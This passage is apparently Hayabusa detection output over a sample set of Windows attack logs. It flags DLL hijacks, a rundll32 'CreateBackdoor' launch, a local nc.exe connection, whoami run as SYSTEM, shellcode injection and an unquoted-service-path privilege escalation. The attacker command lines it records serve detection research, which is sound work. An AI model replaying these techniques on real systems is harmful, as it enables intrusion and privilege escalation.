SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:39.226 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:39.441 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:40.502 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:45.087 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:45.087 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:45.087 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:45.087 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:54.689 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 | PGUID: 747F3D96-9F86-5E75-0000-00101A9F2100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 12:35:35.026 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:35.026 +00:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation_sysmon/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:43.104 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:52.013 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.876 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.876 +00:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.876 +00:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.897 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.897 +00:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.897 +00:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.919 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:56.078 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.899 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.901 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.901 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.901 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.901 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:06.990 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:06.990 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:07.872 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:24.316 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:38.828 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 747F3D96-0880-5E76-0000-001014202B00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:45:04.908 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:04.908 +00:00,MSEDGEWIN10,10,high,Evas | PrivEsc,Shellcode Injection,,rules/sigma/process_access/process_access_win_shellcode_inject_msf_empire.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:04.922 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:04.923 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:16.576 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 747F3D96-8AEC-5E76-0000-00101DDB8003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:16.765 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-04-25 22:18:47.143 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:18:47.143 +00:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,rules/sigma/file_event/file_event_win_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:18:47.143 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:00.308 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:02.057 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:02.057 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:02.057 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:20.134 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:22.312 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:22.596 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-B763-5EA4-0000-00106A480000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:22.630 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:23.220 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:23.222 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:23.224 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:23.876 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:24.049 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:24.054 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:24.188 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:24.194 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.198 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 747F3D96-B764-5EA4-0000-0010DEBF0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.211 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.225 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | 